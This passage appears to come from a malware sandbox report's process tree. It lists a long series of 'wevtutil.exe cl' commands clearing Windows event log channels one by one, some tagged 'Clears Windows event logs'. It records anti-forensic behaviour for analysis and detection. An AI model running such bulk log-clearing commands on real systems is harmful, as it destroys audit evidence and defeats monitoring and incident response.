- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:6228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:6260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:6312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:6352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:6368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:6396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:3864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:6432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:6468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:6492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:6516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:6540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:6588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:6596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:6644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:6664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:3604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:4152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:3540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:4884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:1000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:3532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:2640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:3812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:3916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:5240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:5328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:5584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:5696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:5792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    - Clears Windows event logs
    PID:6012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:4464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    - Clears Windows event logs
    PID:3796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:1376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:6200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:3348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:6452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    - Clears Windows event logs
    PID:6696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:6720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:6740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:6760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:6780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:6824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:6880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:6896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    - Clears Windows event logs
    PID:3268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:6976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:6992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    - Clears Windows event logs
    PID:7028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:7060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:7096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:7136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:3840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:3548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    - Clears Windows event logs
    PID:5956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:6068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:3276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:3220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:2248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:3092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4172
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:4252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:4292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:6580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:6920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    - Clears Windows event logs
    PID:7044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:7144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:3188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:4212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:4408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:4896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:4664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:2172
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    - Clears Windows event logs
    PID:4708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:4760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:4748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:4980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:4908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:4832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:4568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:4516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:4788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:2720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:5080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:2608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:3452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:3404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:2928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:3112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:1336
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:3080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:3464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:2544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:2112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:3132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:2924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:2900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    - Clears Windows event logs
    PID:2292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    - Clears Windows event logs
    PID:2840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:2060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:2520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    - Clears Windows event logs
    PID:1132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:5100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:4072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    - Clears Windows event logs
    PID:3156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:3148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:2968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:3184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:1240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:2124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    - Clears Windows event logs
    PID:5096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:4092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:3892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:4064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    - Clears Windows event logs
    PID:4056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:2788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    - Clears Windows event logs
    PID:2564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:2872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:2516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:1628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:3336
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:2860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:2128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:2320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:3468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:2976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:1380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:3388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:3620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:3596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:3212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:3424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:3420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:3820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:3988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:2856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:3904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    - Clears Windows event logs
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:3928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    - Clears Windows event logs
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:1556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:4024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:5144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:5140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:5128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:5168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:5180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:5164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:5200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:5184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:5212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:5192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:5252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:5280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:5264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:3716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:5316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:5356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:5300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:5372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:5408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:5428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:5400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:5452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:5468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:5472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:5448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:5488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:5516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:5512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:5492
- - C:\Windows\system32\wevtutil.exe
